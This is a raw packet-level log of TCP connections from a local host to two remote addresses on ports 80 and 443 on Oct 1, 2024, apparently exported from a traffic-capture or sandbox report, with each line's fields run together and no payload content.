                                                                                                                                Oct 1, 2024 09:25:20.107147932 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107162952 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107196093 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107342958 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107389927 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107407093 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107443094 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107577085 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107621908 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107646942 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107683897 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107783079 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107831955 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.136852026 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.136887074 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.136944056 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.137264013 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.137280941 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.594293118 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.594510078 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.595812082 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.595820904 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.597127914 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.597131014 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.422153950 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.422209978 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.422225952 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:21.422256947 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:21.422375917 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:21.422391891 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.422400951 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:21.422445059 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:21.422795057 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:21.427527905 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.533859015 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.534043074 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:21.894107103 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:21.899092913 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.899265051 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:21.899398088 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:21.904496908 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366844893 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366871119 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366883039 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366889954 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366895914 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366903067 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366950989 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.366997004 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.367078066 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.367127895 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.367145061 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.367156982 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.367203951 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.367225885 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.367276907 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.371932983 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.372024059 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.372064114 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.372066975 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.372076035 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.372087002 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.372107983 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.372128010 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.453707933 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.453782082 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.454788923 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454847097 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.454931021 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454941988 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454952002 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454961061 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454972029 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454977036 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.454982042 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454993963 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454997063 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455004930 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455014944 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455018044 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455043077 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455060005 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455292940 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455303907 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455339909 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455367088 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455406904 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455440044 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455451012 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455481052 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.456156969 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.456206083 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.456217051 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.456228018 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.456260920 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.456305027 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.456316948 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.456351995 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.457058907 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.457108021 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.457133055 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.457181931 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.457194090 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.457236052 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.458615065 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.458625078 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.458669901 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.467541933 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.540988922 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541014910 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541026115 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541065931 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541074038 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541119099 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541141987 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541141987 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541181087 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541214943 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541227102 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541238070 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541274071 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541307926 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541368008 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541384935 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541395903 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541407108 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541418076 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541428089 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541435957 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541476965 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541476965 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541604996 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541738987 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541793108 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541795015 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541805983 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541846037 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541913033 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541924000 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541966915 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542052984 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542095900 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542104959 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542126894 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542150974 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542186975 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542206049 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542218924 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542229891 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542284966 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542284966 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542349100 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542361021 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542402029 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542555094 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542606115 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542608023 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542619944 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542653084 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542685032 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542793989 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542805910 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542817116 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542829037 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542845964 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542879105 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.542953968 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542965889 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542975903 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542987108 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.542999029 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.543010950 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.543044090 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.543045044 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.543411970 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.543447018 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.543458939 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.543468952 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.543498993 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.543529987 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.543581963 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.543613911 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.543623924 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.543667078 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628259897 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628325939 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628329039 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628338099 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628376961 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628393888 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628401995 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628407955 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628420115 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628443003 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628451109 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628452063 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628453970 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628473043 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628485918 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628503084 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628503084 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628503084 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628536940 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628536940 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628568888 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628580093 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628587008 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628597975 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628607988 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628635883 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628635883 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628669977 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.628915071 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628953934 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628969908 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.628974915 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629007101 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629007101 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629112959 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629123926 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629134893 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629146099 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629164934 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629199982 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629199982 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629265070 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629276037 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629287004 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629334927 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629334927 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629534006 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629594088 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629595041 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629609108 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629652023 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629652023 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629822016 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629832029 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629842997 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629854918 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629890919 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629892111 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.629973888 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629985094 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.629996061 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630007029 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630017996 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630028009 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.630059958 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.630059958 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.630371094 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630433083 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630433083 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.630445004 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630490065 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.630490065 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.630572081 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630584002 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630594969 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630605936 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630639076 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.630639076 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.630672932 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.630799055 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630810976 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630821943 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630834103 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.630871058 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.630871058 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.631130934 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.631186962 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.631216049 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.631227016 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.631268024 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.631398916 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.631413937 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.631423950 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.631436110 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.631447077 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.631460905 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.631495953 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.631495953 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.633187056 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.633246899 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.633805990 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.633862972 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.633869886 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.633874893 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.633908033 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.633934021 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.633949041 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.633960009 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.633970022 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.633980989 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.634002924 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.634035110 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.634145975 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.634157896 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.634169102 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.634179115 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.634190083 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.634202003 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.634208918 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.634243965 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.634243965 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.634335995 CEST8049169104.168.7.8192.168.2.22
